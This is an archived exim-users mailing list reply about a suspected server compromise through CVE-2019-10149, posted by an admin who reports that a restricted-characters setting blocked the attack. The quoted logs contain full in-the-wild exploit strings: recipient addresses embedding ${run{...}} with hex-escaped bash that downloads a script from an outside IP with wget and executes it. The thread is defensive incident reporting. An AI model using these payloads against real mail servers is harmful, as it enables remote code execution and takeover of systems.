Re: [exim] just been hacked, could be CVE-2019-10149?

Top Page
This message is part of the following thread:
M\the complete thread tree sorted by date
MMMarius Schwarz at <-
.MCyborg at ->
Delete this message
Reply to this message
Author: Cyborg
Date:  
To: exim-users
Subject: Re: [exim] just been hacked, could be CVE-2019-10149?
Am 11.06.19 um 08:27 schrieb Odhiambo Washington via Exim-users:
> On Tue, 11 Jun 2019 at 03:19, Calum Mackay via Exim-users <
> exim-users@???> wrote:
>
>> hi all,
>>
>> My mail system has just been hacked; it's running Debian unstable exim
>> 4.91-9
>>
>> Could it be CVE-2019-10149? I don't see any reports of active exploits yet.
>>
>> The reasons I suspect exim involvement:
>>
>> • starting today, every 5 mins getting frozen messages:
>>
>> The following address(es) have yet to be delivered:
>>
>>
>> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
>>
>>

I checked the server i did the restricted chars change for and this is
the result :

2019-06-10 04:31:04 H=(xxxxxxxxxxxxxx.de) [89.248.171.57] F=<> rejected
RCPT
<bin+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ekqvuhtpi\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ekqvuhtpi\x20\x2dn\x22\x20\x26}}@???>:
Restricted characters in address

\o/ Success !  :D


This attack was presented to you by... the Seychelles Islands.


best regards,
Marius

This message was posted to the following mailing lists:
Exim-users
Mailing List Info | Nearby Messages		<-Re: [exim] just been hacked, could be CVE-2019-10149?Re: [exim] just been hacked, could be CVE-2019-10149?->
Tahini and Hummus and Cumin Development Archives administrated by cumin AdminsLurker (version 2.3)